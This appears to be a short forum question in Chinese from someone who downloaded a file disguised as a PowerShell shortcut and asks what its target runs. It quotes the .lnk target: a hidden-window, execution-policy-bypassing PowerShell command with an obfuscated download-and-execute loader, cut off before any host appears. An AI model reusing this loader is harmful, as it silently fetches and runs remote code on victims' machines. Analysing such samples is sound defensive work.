我刚刚下载了一个文件,该文件被隐藏为Powershell的快捷方式。我不确定它看起来很神秘,只是执行了什么代码。这就是.lnk文件目标配置成的:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP & ( $PsHoME[21]+$PShOmE[34]+'X') (( '73-69%88-40j78P101P119z45U79-98U106%101-99s116r32-83P121P115j116x101x109r46x78U101-116z46j87z101x98x67j108U105-101P110j116D41x46r68U111s119
它设置为开始于:
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0